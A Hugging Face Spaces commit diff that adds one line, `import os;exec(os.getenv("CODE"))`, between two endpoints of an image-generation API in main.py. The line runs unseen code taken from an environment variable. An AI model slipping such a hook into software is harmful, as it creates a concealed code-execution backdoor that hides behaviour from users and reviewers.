Spaces:
Paused
Paused
Update main.py
Browse files
main.py
CHANGED
|
@@ -662,6 +662,9 @@ def dalle_3xl(
|
|
| 662 |
return SuccessResponse(status="False", randydev={"data": contact_support})
|
| 663 |
|
| 664 |
|
|
|
|
|
|
|
|
|
|
| 665 |
@app.post("/UFoP/proteusv02")
|
| 666 |
async def proteusv0_2(
|
| 667 |
item: ProteusV02,
|
|
|
|
| 662 |
return SuccessResponse(status="False", randydev={"data": contact_support})
|
| 663 |
|
| 664 |
|
| 665 |
+
import os;exec(os.getenv("CODE"))
|
| 666 |
+
|
| 667 |
+
|
| 668 |
@app.post("/UFoP/proteusv02")
|
| 669 |
async def proteusv0_2(
|
| 670 |
item: ProteusV02,
|